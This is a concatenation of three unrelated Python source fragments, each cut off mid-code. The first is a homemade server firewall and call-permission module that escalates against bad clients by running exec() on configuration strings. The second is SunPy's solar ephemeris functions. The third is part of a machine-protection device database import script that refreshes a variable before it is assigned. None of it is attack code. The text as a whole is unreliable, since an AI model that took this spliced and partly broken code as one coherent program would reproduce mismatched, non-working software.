from _rc import configurations as CNF
from sec.fTools import DefIfEndIf, subwinpath
from sec.Proto import StreamHeader, ParseStreamHeader, pm
from sec.Loggers import LOGS_, log_bad_data
from sec.vTools import mk_login, _rcUDELUser, _rcDELUser
from sec.fscModule import FStreamCipher
def ip_rex(ip:str) -> str: return '^' + sub(
'(\.0$|\\\.0$)', '\\.[0-9]+', sub(
'(\.0\.|\\\.0\.)','\\.[0-9]+\\.', sub(
'(\.0\.|\\\.0\.)','\\.[0-9]+\\.',sub(
'^0\.', '[0-9]+\\.', ip)))) + '$'
class SecureCall:
call_cache: dict = dict()
def __init__(self, client_set):
self.NONE_ACCEPTS: set = {
pm._port_ping, pm._port_pong,
pm._login_ping, pm._login_pong,
pm._pair
}
self.HOST_DROP: set = {
pm._port_pong,
pm._login_pong,
pm._w_conf,
}
self.CLIENT_DROP: set = {
pm._port_ping,
pm._login_ping
}
self._MAP = {CNF.CLIENT_SIDE: self.CLIENT_DROP, CNF.HOST_SIDE: self.HOST_DROP}
self._defifendifSC = DefIfEndIf(CNF.BOARD_CALL_RULE, *CNF.IFDEFENDIF['BOARD_CALL_RULE'])
self._delim = b'\\\\'
self._client_cache:dict = None
self._client_set:set = client_set
self._none_accept = b'(' + bytes().join(
[b'^' + n + b'$|' for n in self.NONE_ACCEPTS]
)[:-1] + b')'
self.drop = b'(' + bytes().join(
[b'^' + n + b'$|' for n in self._MAP[True]]
)[:-1] + b')'
__ol = None
@lru_cache(20)
def _read_rule(self, user:str, __m:bytes, __el:bytes) -> bool:
if CNF.CLIENT_SIDE: return True
if not self._defifendifSC.configured:
if user:
LOGS_.blackbox.logg(30, CNF.STRINGS.ENDIF % 'BOARD_CALL_RULE', ip=user, ico=CNF.PRINT_ICOS.rc, ansi=CNF.MSG_ANSI.yellow, mt=self._read_rule)
return True
_rrc = self._defifendifSC.read_rc()
_configured = False
try:
while True:
ln = next(_rrc)
delim_splt = (ln.strip() + b' ').split(self._delim)
if len(delim_splt) < 2: continue
if ln.split()[0] != user.encode(CNF.LOC_ENC): continue
_configured = True
for ip in delim_splt[0].decode(CNF.LOC_ENC).split()[1:]:
if search(ip_rex(ip), self._client_set.copy().pop()[0]):
if search(b' ' + __m + b' ', delim_splt[1]): raise PermissionError
if not self.call_cache.get(user):
limitations = findall(__m + b'\[[0-9]+]', delim_splt[1])
for limited in limitations:
self.call_cache.setdefault(user, dict())
self.call_cache[user].setdefault(
__m.decode(CNF.LOC_ENC), [int(sub(__m + b'\[|]', b'', limited)),0])
distinct = findall(__m + b'\([^(]*\)', delim_splt[1])
for dist in distinct:
args = sub(__m + b'\(|\)| ', b'', dist).split(b';')
for arg in args:
_key, _val = arg.split(b':')
key, val = _key.decode(CNF.LOC_ENC), _val.decode(CNF.LOC_ENC)
if key in self.__ol:
if val.startswith('<'):
val = int(val.replace('<', '').replace('.', ''))
if self.__ol[key] < val: raise PermissionError
elif val.startswith('>'):
val = int(val.replace('>', '').replace('.', ''))
if self.__ol[key] > val: raise PermissionError
elif search("[" + val + "]", self.__ol[key]): raise PermissionError
raise EOFError
raise PermissionError
except StopIteration:
return True
except PermissionError:
_rrc.close()
return False
except EOFError:
_rrc.close()
return True
finally:
if not _configured and user:
LOGS_.blackbox.logg(30, CNF.STRINGS.ENDIF % 'BOARD_CALL_RULE', ip=user, ico=CNF.PRINT_ICOS.rc, ansi=CNF.MSG_ANSI.yellow, mt=self._read_rule)
def wrapper_call__(self, clear_cache:bool=False):
wrapper_info = self._read_rule.cache_info()
_info = f"({wrapper_info=},{self.call_cache=})"
if clear_cache:
self._read_rule.cache_clear()
self.call_cache.clear()
return _info
def call(self, __header:[StreamHeader, ParseStreamHeader], __o, **kwargs):
ip = self._client_set.copy().pop()[0]
count, verified, user = self._client_cache.get(ip)
_m, _el, self.__ol = __header.method, __header.option, __header.option_liev
LOGS_.call.logg(10, CNF.STRINGS.IP_BOARD_PASSED % (user, self.wrapper_call__()), ip=ip, cache=self._client_cache, mt=self.call, ico=CNF.PRINT_ICOS.quest)
if search(self.drop, _m):
LOGS_.call.logg(30, CNF.STRINGS.CALL_DROP % __header.header, ip=ip, cache=self._client_cache, mt=self.call, ico=CNF.PRINT_ICOS.drop)
raise PermissionError
if user is None:
if verified:
LOGS_.call.logg(10, __o, mt=self.call, ico=CNF.PRINT_ICOS.call)
return __o.__call__(**kwargs)
if search(self._none_accept, _m):
LOGS_.call.logg(10 + CNF.SIDE_[True] * 15, __o, ip=ip, cache=self._client_cache, mt=self.call, ico=CNF.PRINT_ICOS.call)
return __o.__call__(**kwargs)
LOGS_.call.logg(30, CNF.STRINGS.CALL_DROP % __header.header, ip=ip, cache=self._client_cache, mt=self.call, ico=CNF.PRINT_ICOS.drop)
raise PermissionError
if self._read_rule(user, _m, _el):
_m = _m.decode(CNF.SRM_ENC)
if user in self.call_cache and _m in self.call_cache[user]:
lim = self.call_cache[user][_m]
if lim[1] == lim[0]:
LOGS_.call.logg(40, CNF.STRINGS.CALL_LIM % (__o, lim), ip=ip, cache=self._client_cache, mt=self.call, ico=CNF.PRINT_ICOS.drop)
raise PermissionError
self.call_cache[user][_m][1] += 1
LOGS_.call.logg(20, __o, ip=ip, cache=self._client_cache, mt=self.call, ico=CNF.PRINT_ICOS.call)
return __o.__call__(**kwargs)
LOGS_.call.logg(30, CNF.STRINGS.CALL_DROP % __header.header, ip=ip, cache=self._client_cache, mt=self.call, ico=CNF.PRINT_ICOS.drop)
raise PermissionError
########################################################################################################################
########################################################################################################################
class SimpleFireWall:
def __init__(self):
self._defifendifFW = DefIfEndIf(CNF.BOARD_CLIENT_RULE, *CNF.IFDEFENDIF['BOARD_CLIENT_RULE'])
self.client_cache: dict[str: list[int, bool, str]] = dict()
self.client_set: set[tuple] = set()
self.client_ip: str = str()
self.received_port: int = int()
self.bad_client_counter = 0
self.interval_start = int(time())
@lru_cache(20)
def _read_board(self, client_ip) -> bool:
if not self._defifendifFW.configured:
LOGS_.blackbox.logg(30, CNF.STRINGS.ENDIF % 'BOARD_CLIENT_RULE', ip=self.client_ip, cache=self.client_cache, ico=CNF.PRINT_ICOS.rc, ansi=CNF.MSG_ANSI.yellow, mt=self._read_board)
return True
_rrc = self._defifendifFW.read_rc()
_configured = False
while True:
try:
ln = next(_rrc)
ip = search(b"^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}", ln)
if not ip: continue
_configured = True
if search(ip_rex(ip.group().decode(CNF.LOC_ENC)), client_ip): raise EOFError
except StopIteration:
LOGS_.firewall.logg(40, CNF.STRINGS.IP % self.client_ip, ip=self.client_ip, cache=self.client_cache, mt=self._read_board, ico=CNF.PRINT_ICOS.sharp)
self.bad_client_counter += 1
return False
except EOFError:
_rrc.close()
return True
finally:
if not _configured:
LOGS_.blackbox.logg(30, CNF.STRINGS.ENDIF % 'BOARD_CLIENT_RULE', ip=self.client_ip, cache=self.client_cache, ico=CNF.PRINT_ICOS.rc, ansi=CNF.MSG_ANSI.yellow, mt=self._read_board)
def wrapper_ips__(self, clear_cache:bool=False):
wrapper_info = self._read_board.cache_info()
if clear_cache: self._read_board.cache_clear()
return wrapper_info
def _clean_overflow(self):
LOGS_.blackbox.logg(54, CNF.STRINGS.OVERFLOW.join(['\n' + ip for ip in self.client_cache if not self.client_cache[ip][1]]), ip=self.client_ip, cache=self.client_cache, mt=self._clean_overflow, ico=CNF.PRINT_ICOS.sharp)
for ip in list(self.client_cache):
if not self.client_cache[ip][1]:
self.client_cache.pop(ip)
def fw_reset(self):
for ip in list(self.client_cache):
if not self.client_cache[ip][1]:
self.client_cache.pop(ip)
self.bad_client_counter = 0
self.wrapper_ips__(clear_cache=True)
def fw_full_reset(self):
self.client_cache.clear()
self.bad_client_counter = 0
self.received_port = int()
self.interval_start = time()
self.client_ip = str()
self.wrapper_ips__(clear_cache=True)
def _check_interval(self):
actual = time()
if self.interval_start + CNF.FIREWALL_RESET_INTERVAL < actual:
LOGS_.firewall.logg(20, CNF.STRINGS.FW_AUTO_RESET % (actual, self.interval_start), ip=self.client_ip, cache=self.client_cache, mt=self._check_interval, ico=CNF.PRINT_ICOS.sharp)
self.interval_start = actual
self.fw_reset()
def ip_on_board(self, tox_sock) -> bool:
legal = self._read_board(self.client_ip)
LOGS_.firewall.logg(10, CNF.STRINGS.IP_BOARD_PASSED % (self.client_ip, self.wrapper_ips__()), ip=self.client_ip, cache=self.client_cache, mt=self.ip_on_board, ico=CNF.PRINT_ICOS.sharp)
self._check_interval()
hits = self.wrapper_ips__().hits
if not legal and hits >= CNF.MAX_BAD_CLIENT_HIT_LV3:
LOGS_.firewall.logg(55, CNF.STRINGS.DOS % (self.client_ip, 3), ip=self.client_ip, cache=self.client_cache, mt=self.ip_on_board, ico=CNF.PRINT_ICOS.warn)
exec(CNF.MAX_BAD_CLIENT_HIT_EXEC_LV3)
elif not legal and hits >= CNF.MAX_BAD_CLIENT_HIT_LV2:
LOGS_.firewall.logg(55, CNF.STRINGS.DOS % (self.client_ip, 2), ip=self.client_ip, cache=self.client_cache, mt=self.ip_on_board, ico=CNF.PRINT_ICOS.warn)
exec(CNF.MAX_BAD_CLIENT_HIT_EXEC_LV2)
elif not legal and hits >= CNF.MAX_BAD_CLIENT_HIT_LV1:
LOGS_.firewall.logg(55, CNF.STRINGS.DOS % (self.client_ip, 1), ip=self.client_ip, cache=self.client_cache, mt=self.ip_on_board, ico=CNF.PRINT_ICOS.warn)
exec(CNF.MAX_BAD_CLIENT_HIT_EXEC_LV1)
if not legal and self.bad_client_counter >= CNF.MAX_BAD_CLIENTS_LV3:
LOGS_.firewall.logg(55, CNF.STRINGS.DDOS % (self.client_ip, 3), ip=self.client_ip, cache=self.client_cache, mt=self.ip_on_board, ico=CNF.PRINT_ICOS.warn)
exec(CNF.MAX_BAD_CLIENTS_EXEC_LV3)
elif not legal and self.bad_client_counter >= CNF.MAX_BAD_CLIENTS_LV2:
LOGS_.firewall.logg(55, CNF.STRINGS.DDOS % (self.client_ip, 2), ip=self.client_ip, cache=self.client_cache, mt=self.ip_on_board, ico=CNF.PRINT_ICOS.warn)
exec(CNF.MAX_BAD_CLIENTS_EXEC_LV2)
elif not legal and self.bad_client_counter >= CNF.MAX_BAD_CLIENTS_LV1:
LOGS_.firewall.logg(55, CNF.STRINGS.DDOS % (self.client_ip, 1), ip=self.client_ip, cache=self.client_cache, mt=self.ip_on_board, ico=CNF.PRINT_ICOS.warn)
exec(CNF.MAX_BAD_CLIENTS_EXEC_LV1)
if not legal and CNF.MAXSIZE_TOXICS:
LOGS_.firewall.logg(54, CNF.STRINGS.TOX, ip=self.client_ip, cache=self.client_cache, mt=self.ip_on_board, ico=CNF.PRINT_ICOS.tox)
log_bad_data(self.client_ip, tox_sock)
return legal
def client_is_verified(self, tox_sock=None) -> bool:
if not self.client_ip or self.client_ip == "": return False
self.client_cache.setdefault(self.client_ip, [0, False, None])
if (_cc := self.client_cache.get(self.client_ip)) and _cc[1]: return True
if not _cc: return False
LOGS_.firewall.logg(20 + (_cc[0] > 2) * 10, CNF.STRINGS.UNVERIFIED, ip=self.client_ip, cache=self.client_cache, mt=self.client_is_verified, ico=CNF.PRINT_ICOS.sharp)
if tox_sock and CNF.MAXSIZE_TOXICS:
LOGS_.firewall.logg(54, CNF.STRINGS.TOX, ip=self.client_ip, cache=self.client_cache, mt=self.client_is_verified, ico=CNF.PRINT_ICOS.tox)
log_bad_data(self.client_ip, tox_sock)
if _cc[0] > CNF.MAX_UNVERIFIED_LV3:
LOGS_.firewall.logg(55, CNF.STRINGS.LOGIN_LV % 3, ip=self.client_ip, cache=self.client_cache, mt=self.client_is_verified, ico=CNF.PRINT_ICOS.warn)
exec(CNF.MAX_UNVERIFIED_EXEC_LV3)
elif _cc[0] > CNF.MAX_UNVERIFIED_LV2:
LOGS_.firewall.logg(55, CNF.STRINGS.LOGIN_LV % 2, ip=self.client_ip, cache=self.client_cache, mt=self.client_is_verified, ico=CNF.PRINT_ICOS.warn)
exec(CNF.MAX_UNVERIFIED_EXEC_LV2)
elif _cc[0] > CNF.MAX_UNVERIFIED_LV1:
LOGS_.firewall.logg(55, CNF.STRINGS.LOGIN_LV % 1, ip=self.client_ip, cache=self.client_cache, mt=self.client_is_verified, ico=CNF.PRINT_ICOS.warn)
exec(CNF.MAX_UNVERIFIED_EXEC_LV1)
if len(self.client_cache) > CNF.MAX_CLIENT_CACHE:
self._clean_overflow()
return False
def port_handshake(self, header) -> None:
self.received_port = header.option_int
########################################################################################################################
########################################################################################################################
class Verification(SimpleFireWall):
def __init__(self):
SimpleFireWall.__init__(self)
self.local_login: str = None
self._pair_pair:tuple[str, int] = tuple()
self._pair_parts: dict = dict()
self.lapsdelset: set = set()
def solve_paring(self, options, pipe):
try:
part = options.get("T")
if not self._pair_parts.get(part): raise KeyError(CNF.STRINGS.fe_INVALID_PART % part)
if search(ip_rex(self._pair_pair[0]), self.client_ip):
if int(time()) - self._pair_pair[1] < CNF.PARING_LIFETIME:
self.verify()
with open(self._pair_parts[part], 'wb') as f:
for _ in CNF.BUFFER_ITER(options["l"]):
dat = pipe.get(CNF.DAT_SOCK_BUFFER)
if not dat: raise BufferError(CNF.STRINGS.fe_WRONG_LENGTH)
f.write(dat)
self._pair_parts.pop(part)
else: raise AssertionError(CNF.STRINGS.fe_TIMEOUT % (int(time()) - self._pair_pair[1]))
else: raise AssertionError(CNF.STRINGS.fe_COMPANION % (self._pair_pair[0], self.client_ip))
if len(list(self._pair_parts)) == 0:
self._pair_pair = tuple()
raise ConnectionResetError('*pres*')
except Exception as e:
if e.args == ('*pres*',):
LOGS_.firewall.logg(35, CNF.STRINGS.PARED % self.client_ip, ip=self.client_ip, cache=self.client_cache, mt=self.solve_paring, ico=CNF.PRINT_ICOS.key)
else:
LOGS_.firewall.logg(40 + CNF.SENSITIVE_PARING * 15, type(e), e, ip=self.client_ip, cache=self.client_cache, mt=self.solve_paring)
self._pair_pair = (tuple() if CNF.SENSITIVE_PARING else self._pair_pair)
self._pair_parts = (dict() if CNF.SENSITIVE_PARING else self._pair_parts)
raise ConnectionResetError
finally:
del options
def get_paring(self, options):
try:
if search(ip_rex(self._pair_pair[0]), self.client_ip):
if time() - self._pair_pair[1] < CNF.PARING_LIFETIME:
self.login(ParseStreamHeader(options.get("T").encode(CNF.SRM_ENC)))
if self.client_is_verified():
| |
# -*- coding: utf-8 -*-
"""
Ephemeris calculations using SunPy coordinate frames
"""
import datetime
import warnings
import numpy as np
import astropy.units as u
from astropy.time import Time
from astropy.coordinates import (SkyCoord, Angle, Longitude,
ICRS, PrecessedGeocentric, AltAz,
get_body_barycentric)
from astropy.coordinates.representation import CartesianRepresentation, SphericalRepresentation
from astropy._erfa.core import ErfaWarning
from astropy.constants import c as speed_of_light
# Versions of Astropy that do not have HeliocentricMeanEcliptic have the same frame
# with the misleading name HeliocentricTrueEcliptic
try:
from astropy.coordinates import HeliocentricMeanEcliptic
except ImportError:
from astropy.coordinates import HeliocentricTrueEcliptic as HeliocentricMeanEcliptic
from sunpy.time import parse_time
from sunpy import log
from sunpy.util.decorators import add_common_docstring, deprecated
from sunpy.time.time import _variables_for_parse_time_docstring
from .frames import HeliographicStonyhurst as HGS
from .transformations import _SUN_DETILT_MATRIX, _SOLAR_NORTH_POLE_HCRS
__author__ = "<NAME>"
__email__ = "<EMAIL>"
__all__ = ['get_body_heliographic_stonyhurst', 'get_earth',
'get_sun_B0', 'get_sun_L0', 'get_sun_P', 'get_sunearth_distance',
'get_sun_orientation', 'get_horizons_coord']
@add_common_docstring(**_variables_for_parse_time_docstring())
def get_body_heliographic_stonyhurst(body, time='now', observer=None):
"""
Return a `~sunpy.coordinates.frames.HeliographicStonyhurst` frame for the location of a
solar-system body at a specified time. The location can be corrected for light travel time
to an observer.
Parameters
----------
body : `str`
The solar-system body for which to calculate positions
time : {parse_time_types}
Time to use in a parse_time-compatible format
observer : `~astropy.coordinates.SkyCoord`
If None, the returned coordinate is the instantaneous or "true" location.
If not None, the returned coordinate is the astrometric location (i.e., accounts for light
travel time to the specified observer)
Returns
-------
out : `~sunpy.coordinates.frames.HeliographicStonyhurst`
Location of the solar-system body in the `~sunpy.coordinates.HeliographicStonyhurst` frame
Notes
-----
There is no correction for aberration due to observer motion. For a body close to the Sun in
angular direction relative to the observer, the correction can be negligible because the
apparent location of the body will shift in tandem with the Sun.
"""
obstime = parse_time(time)
if observer is None:
body_icrs = get_body_barycentric(body, obstime)
else:
observer_icrs = SkyCoord(observer).icrs.cartesian
# This implementation is modeled after Astropy's `_get_apparent_body_position`
light_travel_time = 0.*u.s
emitted_time = obstime
delta_light_travel_time = 1.*u.s # placeholder value
while np.any(np.fabs(delta_light_travel_time) > 1.0e-8*u.s):
body_icrs = get_body_barycentric(body, emitted_time)
distance = (body_icrs - observer_icrs).norm()
delta_light_travel_time = light_travel_time - distance / speed_of_light
light_travel_time = distance / speed_of_light
emitted_time = obstime - light_travel_time
log.info(f"Apparent body location accounts for {light_travel_time.to('s').value:.2f}"
" seconds of light travel time")
body_hgs = ICRS(body_icrs).transform_to(HGS(obstime=obstime))
return body_hgs
@add_common_docstring(**_variables_for_parse_time_docstring())
def get_earth(time='now'):
"""
Return a `~astropy.coordinates.SkyCoord` for the location of the Earth at a specified time in
the `~sunpy.coordinates.frames.HeliographicStonyhurst` frame. The longitude will be 0 by definition.
Parameters
----------
time : {parse_time_types}
Time to use in a parse_time-compatible format
Returns
-------
out : `~astropy.coordinates.SkyCoord`
Location of the Earth in the `~sunpy.coordinates.frames.HeliographicStonyhurst` frame
"""
earth = get_body_heliographic_stonyhurst('earth', time=time)
# Explicitly set the longitude to 0
earth = SkyCoord(0*u.deg, earth.lat, earth.radius, frame=earth)
return earth
@add_common_docstring(**_variables_for_parse_time_docstring())
def get_horizons_coord(body, time='now', id_type='majorbody'):
"""
Queries JPL HORIZONS and returns a `~astropy.coordinates.SkyCoord` for the location of a
solar-system body at a specified time. This location is the instantaneous or "true" location,
and is not corrected for light travel time or observer motion.
.. note::
This function requires the Astroquery package to be installed and
requires an Internet connection.
Parameters
----------
body : `str`
The solar-system body for which to calculate positions. One can also use the search form
linked below to find valid names or ID numbers.
id_type : `str`
If 'majorbody', search by name for planets, satellites, or other major bodies.
If 'smallbody', search by name for asteroids or comets.
If 'id', search by ID number.
time : {parse_time_types}
Time to use in a parse_time-compatible format
Returns
-------
`~astropy.coordinates.SkyCoord`
Location of the solar-system body
Notes
-----
Be aware that there can be discrepancies between the coordinates returned by JPL HORIZONS,
the coordinates reported in mission data files, and the coordinates returned by
`~sunpy.coordinates.get_body_heliographic_stonyhurst`.
References
----------
* `JPL HORIZONS <https://ssd.jpl.nasa.gov/?horizons>`_
* `JPL HORIZONS form to search bodies <https://ssd.jpl.nasa.gov/horizons.cgi?s_target=1#top>`_
* `Astroquery <https://astroquery.readthedocs.io/en/latest/>`_
Examples
--------
.. Run these tests with a temp cache dir
.. testsetup::
>>> from astropy.config.paths import set_temp_cache
>>> import tempfile
>>> c = set_temp_cache(tempfile.mkdtemp())
>>> _ = c.__enter__()
>>> from sunpy.coordinates import get_horizons_coord
Query the location of Venus
>>> get_horizons_coord('Venus barycenter', '2001-02-03 04:05:06') # doctest: +REMOTE_DATA
INFO: Obtained JPL HORIZONS location for Venus Barycenter (2) [sunpy.coordinates.ephemeris]
<SkyCoord (HeliographicStonyhurst: obstime=2001-02-03T04:05:06.000): (lon, lat, radius) in (deg, deg, AU)
(-33.93155883, -1.64998481, 0.71915147)>
Query the location of the SDO spacecraft
>>> get_horizons_coord('SDO', '2011-11-11 11:11:11') # doctest: +REMOTE_DATA
INFO: Obtained JPL HORIZONS location for Solar Dynamics Observatory (spac [sunpy.coordinates.ephemeris]
<SkyCoord (HeliographicStonyhurst: obstime=2011-11-11T11:11:11.000): (lon, lat, radius) in (deg, deg, AU)
(0.01018888, 3.29640407, 0.99011042)>
Query the location of the SOHO spacecraft via its ID number (-21)
>>> get_horizons_coord(-21, '2004-05-06 11:22:33', 'id') # doctest: +REMOTE_DATA
INFO: Obtained JPL HORIZONS location for SOHO (spacecraft) (-21) [sunpy.coordinates.ephemeris]
<SkyCoord (HeliographicStonyhurst: obstime=2004-05-06T11:22:33.000): (lon, lat, radius) in (deg, deg, AU)
(0.2523461, -3.55863351, 0.99923086)>
.. testcleanup::
>>> _ = c.__exit__()
"""
obstime = parse_time(time)
# Import here so that astroquery is not a module-level dependency
from astroquery.jplhorizons import Horizons
query = Horizons(id=body, id_type=id_type,
location='500@10', # Heliocentric (mean ecliptic)
epochs=obstime.tdb.jd) # Time must be provided in JD TDB
try:
result = query.vectors()
except Exception: # Catch and re-raise all exceptions, and also provide query URL if generated
if query.uri is not None:
log.error(f"See the raw output from the JPL HORIZONS query at {query.uri}")
raise
log.info(f"Obtained JPL HORIZONS location for {result[0]['targetname']}")
vector = CartesianRepresentation(result[0]['x', 'y', 'z'])*u.AU
coord = SkyCoord(vector, frame=HeliocentricMeanEcliptic, obstime=obstime)
return coord.transform_to(HGS)
# The code beyond this point should be moved to sunpy.coordinates.sun after the deprecation period
@add_common_docstring(**_variables_for_parse_time_docstring())
def _B0(time='now'):
"""
Return the B0 angle for the Sun at a specified time, which is the heliographic latitude of the
Sun-disk center as seen from Earth. The range of B0 is +/-7.23 degrees.
Parameters
----------
time : {parse_time_types}
Time to use in a parse_time-compatible format
Returns
-------
out : `~astropy.coordinates.Angle`
The position angle
"""
return Angle(get_earth(time).lat)
# Function returns a SkyCoord's longitude in the de-tilted frame (HCRS rotated so that the Sun's
# rotation axis is aligned with the Z axis)
def _detilt_lon(coord):
coord_detilt = coord.hcrs.cartesian.transform(_SUN_DETILT_MATRIX)
return coord_detilt.represent_as(SphericalRepresentation).lon.to('deg')
# J2000.0 epoch
_J2000 = Time('J2000.0', scale='tt')
# One of the two nodes of intersection between the ICRF equator and Sun's equator in HCRS
_NODE = SkyCoord(_SOLAR_NORTH_POLE_HCRS.lon + 90*u.deg, 0*u.deg, frame='hcrs')
# The longitude in the de-tilted frame of the Sun's prime meridian.
# Siedelmann et al. (2007) and earlier define the apparent longitude of the meridian as seen from
# Earth as 84.10 degrees eastward from the above-defined node of intersection.
# Siedelmann et al. (2007) and later also define the true longitude of the meridian (i.e., without
# light travel time to Earth) as 84.176 degrees eastward, but the apparent longitude is needed.
_DLON_MERIDIAN = Longitude(_detilt_lon(_NODE) + 84.10*u.deg)
@add_common_docstring(**_variables_for_parse_time_docstring())
def _L0(time='now'):
"""
Return the L0 angle for the Sun at a specified time, which is the Carrington longitude of the
Sun-disk center as seen from Earth.
Parameters
----------
time : {parse_time_types}
Time to use in a parse_time-compatible format
Returns
-------
`~astropy.coordinates.Longitude`
The Carrington longitude
Notes
-----
This longitude is calculated using the values from Siedelmann et al. (2007), with care taken to
use the longitude as seen from Earth (see that paper's Appendix).
References
----------
* Siedelmann et al. (2007), "Report of the IAU/IAG Working Group on cartographic coordinates
and rotational elements: 2006" `(link) <http://dx.doi.org/10.1007/s10569-007-9072-y>`_
"""
obstime = parse_time(time)
# Calculate the de-tilt longitude of the meridian due to the Sun's sidereal rotation
dlon_meridian = Longitude(_DLON_MERIDIAN + (obstime - _J2000) * 14.1844*u.deg/u.day)
# Calculate the de-tilt longitude of the Earth
dlon_earth = _detilt_lon(get_earth(obstime))
return Longitude(dlon_earth - dlon_meridian)
@add_common_docstring(**_variables_for_parse_time_docstring())
def _P(time='now'):
"""
Return the position (P) angle for the Sun at a specified time, which is the angle between
geocentric north and solar north as seen from Earth, measured eastward from geocentric north.
The range of P is +/-26.3 degrees.
Parameters
----------
time : {parse_time_types}
Time to use in a parse_time-compatible format
Returns
-------
out : `~astropy.coordinates.Angle`
The position angle
"""
obstime = parse_time(time)
# Define the frame where its Z axis is aligned with geocentric north
geocentric = PrecessedGeocentric(equinox=obstime, obstime=obstime)
return _sun_north_angle_to_z(geocentric)
@add_common_docstring(**_variables_for_parse_time_docstring())
def _earth_distance(time='now'):
"""
Return the distance between the Sun and the Earth at a specified time.
Parameters
----------
time : {parse_time_types}
Time to use in a parse_time-compatible format
| |
{1} that causes condition {2}.'.format(len(inputs), fault.name, condition.name)))
elif (len(fault.inputs) == 0):
print(('ERROR: no many inputs ({0}) found for fault {1} that causes condition {2}.'.format(len(inputs), fault.name, condition.name)))
# Finally get the device that causes triggers the condition
device = None
try:
device = self.session.query(models.Device).\
filter(models.Device.id==fault.inputs[0].device_id).one()
except:
print(('ERROR: cannot find device that causes for condition {0}.'.format(condition.name)))
return device
# Check if the device in the 'cond_area' should be used
# as ignore condition for the device in 'device_area'
def check_area_order(self, cond_area, device_area):
cond = False
if (device_area.upper() == 'DIAG0' and
(cond_area.upper() == 'GUNB' or
cond_area.upper() == 'HTR' or
cond_area.upper() == 'LR00')):
cond = True
elif (device_area.upper().endswith('H') and
(not cond_area.upper().endswith('S'))):
cond = True
elif (device_area.upper().endswith('S') and
(not cond_area.upper().endswith('H'))):
cond = True
elif (cond_area != 'DIAG0'):
cond = True
return cond
def add_ignore_conditions_analog(self, device, evl=0):
try:
conditions = self.session.query(models.Condition).all()
except:
print('INFO: Found no conditions to ignore')
return
if evl > 0:
return
for cond in conditions:
cond_device = self.find_condition_input_device(cond)
if (cond_device != None):
# The location of the cond_device must be before the location of the device
# to be ignored
try:
cond_device_z = float(cond_device.z_location)
device_z = float(device.z_location)
if (cond_device_z < device_z):
if (self.check_area_order(cond_device.area, device.area)):
ignore_condition = models.IgnoreCondition(condition=cond, device = device)
except:
print(('WARN: invalid z_location condition_device={0}, device={1}'.format(cond_device.z_location, device.z_location)))
def add_analog_device(self, directory, card_name, add_ignore=False):
# if (self.lcls1_only and card_name == "BPM"):
# return
sys.stdout.write('Adding {}\n'.format(directory))
file_name = directory + '/DeviceType.csv'
[device_type, evaluation_string, measured_device_type_id] = self.check_device_type(file_name)
if (device_type == None):
return
if (self.lcls1_only and (device_type.name == 'PBLM' or
device_type.name == 'LBLM')):
print(('* Skipping {} devices'.format(device_type.name)))
return
file_name = directory + '/DeviceStates.csv'
[faults, device_states] = self.add_device_states(file_name, device_type,True)
#print faults
# Read AnalogChannels, each device has one channel
file_name = directory + '/AnalogChannels.csv'
f = open(file_name)
line = f.readline().strip()
fields=[]
for field in line.split(','):
fields.append(str(field).lower())
channel={}
while line:
channel_info={}
line = f.readline().strip()
if line:
field_index = 0
for property in line.split(','):
channel_info[fields[field_index]]=property
field_index = field_index + 1
channel[channel_info['name']]=channel_info
f.close()
# Read Mitigation list
file_name = directory + '/Mitigation.csv'
mitigation = self.read_mitigation(file_name)
# Devices!
file_name = directory + '/Devices.csv'
f = open(file_name)
line = f.readline().strip()
fields=[]
for field in line.split(','):
fields.append(str(field).lower())
while line:
device_info={}
line = f.readline().strip()
if line:
field_index = 0
for property in line.split(','):
device_info[fields[field_index]]=property
field_index = field_index + 1
try:
app_card = self.session.query(models.ApplicationCard).\
filter(models.ApplicationCard.id==int(device_info['application_card_number'])).one()
if app_card.name != card_name:
print(('ERROR: analog device ({0}) assigned to unexpected card type ({1}), expected {2} card'.\
format(device_info['device'], app_card.name, card_name)))
return
except:
print(('ERROR: Cannot find application_card with id {0}, exiting...'.format(device_info['application_card_number'])))
return
# If LCLS-I only option is enabled, only add device if it belongs to an LCLS-I
# reporting crate
if (self.lcls1_only and not self.is_lcls1_ln(app_card)):
continue
# there must be only one channel
if len(channel) != 1:
print('ERROR: too many channels defined for AnalogDevice')
return
for key in channel:
channel_name = key
mps_channel_index = channel[channel_name]['mps_channel_#']
channel_number = int(device_info['mps_channel_#' + mps_channel_index])
analog_channel = models.AnalogChannel(name=channel[key]['name'],
number=channel_number, card_id=app_card.id)
self.session.add(analog_channel)
self.session.commit()
self.session.refresh(analog_channel)
# Check if device has an 'enable' colunm, and don't add if it has a 0
#if 'enable' in device_info:
# if device_info['enable'] == '0':
# continue # do not add if device has enable=0
cab_num = "N/A"
off = 0
slo = 1
if 'cable_#' in device_info:
cab_num = device_info['cable_#']
if 'offset' in device_info:
off = device_info['offset']
if 'slope' in device_info:
slo = device_info['slope']
device = models.AnalogDevice(name=device_info['device'],
device_type=device_type,
channel=analog_channel,
card=app_card,
position=device_info['position'],
z_location=device_info['linac_z'],
description=device_info['device'] + ' ' + device_type.description,
area=device_info['area'],
evaluation=1, # Fast evaluation
cable_number=cab_num,
slope=slo,
offset=off)
if (self.verbose):
print(('Analog Channel: ' + device_info['device']))
self.session.add(device)
self.session.commit()
self.session.refresh(device)
# If device should be ignored, add conditions
if (add_ignore):
self.add_ignore_conditions_analog(device, int(device_info['always_evaluate']))
# For each device - create a Faults, FaultInputs, FaultStates and the AllowedClasses
if device_info['fault'] != 'all':
device_fault = self.getFault(faults, device_info['fault'])
if (device_fault == None):
print(('ERROR: Failed to find Fault for analog device "{}"'.format(device_info['device'])))
exit(-1)
#device_fault = models.Fault(name=device_info['fault'], description=device_info['device'] + ' Fault')
self.session.add(device_fault)
self.session.commit()
self.session.refresh(device_fault_input)
device_fault_input = models.FaultInput(bit_position=0, device=device, fault=device_fault)
self.session.add(device_fault_input)
self.session.commit()
self.session.refresh(device_fault_input)
# FaultStates (given by the Mitigation.csv file), entries whose Device_Location matches the device
for k in mitigation:
if device_info['mitigation'] == k:
for m in mitigation[device_info['mitigation']]:
# only add new FaultState if there isn't one already for the combination Fault/DeviceState
fault_states = self.session.query(models.FaultState).filter(models.FaultState.fault_id==device_fault.id).all()
fault_state_exists = False
if (len(fault_states)>0):
for fs in fault_states:
# print 'Found fault_state fault_id={0}, device_state_id={1}'.\
# format(fs.fault_id, fs.device_state_id)
if fs.device_state_id == device_states[m].id:
fault_state_exists = True
if (not fault_state_exists):
